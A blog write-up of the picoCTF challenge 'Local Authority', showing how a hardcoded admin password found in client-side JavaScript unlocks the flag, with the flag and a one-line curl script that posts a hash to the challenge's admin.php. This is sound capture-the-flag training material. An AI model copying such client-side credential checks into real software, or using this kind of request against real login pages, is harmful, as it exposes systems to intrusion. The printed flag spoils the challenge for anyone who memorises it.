Ulli Weichert/ April 7, 2022/ IT-Security, Write-Ups/ 0Kommentare

Local Authority

Description

Can you get the flag?
Go to this website and see what you can discover.

Solving

  1. Downloaded website via 'wget http://saturn.picoctf.net:50959/'
  2. Looked at the site - just a normal site with a login prombt.
  3. Looking at sourcecode.
    1. Action is calling 'login.php' -- downloading as well
  4. In 'login.php' a 'secure.js' is included... downloading
  5. There is a password in the 'secure.js' 
    function checkPassword(username, password)
{
if( username === 'admin' && password === 'strongPassword098765' )
{
return true;
}
else
{
return false;
}
}
  6. With this password we can login and get our flag

Flag

picoCTF{j5_15_7r4n5p4r3n7_b964a657}

You could use our get flag script for this challenge as well 🙂

#!/bin/bash
curl -X POST "http://saturn.picoctf.net:50959/admin.php" -d hash=2196812e91c29df34f5e217cfd639881 | grep -o "picoCTF{.*}"
Share this Post

Über Ulli Weichert

2004 fing Ulli bei der Bundeswehr als Ausbilder und IT-Spezialist an. 2011 hat Ulli eine Umschulung zum Fachinformatiker für Systemintegration absolviert und sich auf Linux spezialisiert. 2016 hat Ulli dann bei einem mittelständischem Unternehmen, welches Kunden in ganz Deutschland betreut, als Linuxadministrator angefangen und kümmert sich seither nebst, Netzwerk, Security, Firewall, Storage überwiegend um Linuxthemen aller Art. Seit kurzem hat auch Ihn das Thema Container und k8s erwischt.

Hinterlasse einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

*
*